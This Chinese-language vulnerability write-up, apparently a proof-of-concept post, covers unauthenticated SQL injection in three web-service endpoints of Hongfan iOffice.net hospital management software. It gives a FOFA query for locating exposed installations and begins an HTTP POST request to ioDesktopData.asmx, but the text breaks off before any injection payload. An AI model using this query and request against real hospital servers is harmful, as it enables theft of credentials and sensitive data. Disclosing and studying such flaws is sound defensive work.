0x01 产品简介
红帆iOffice.net从最早满足医院行政办公需求(传统OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。
0x02 漏洞概述
红帆iOffice.net ioDesktopData.asmx、wssRtSyn.asmx、GetWorkUnit.asmx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
0x03 复现环境
FOFA:app="红帆-ioffice"
0x04 漏洞复现
PoC-1
POST /iOffice/prg/set/wss/ioDesktopData.asmx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Fir
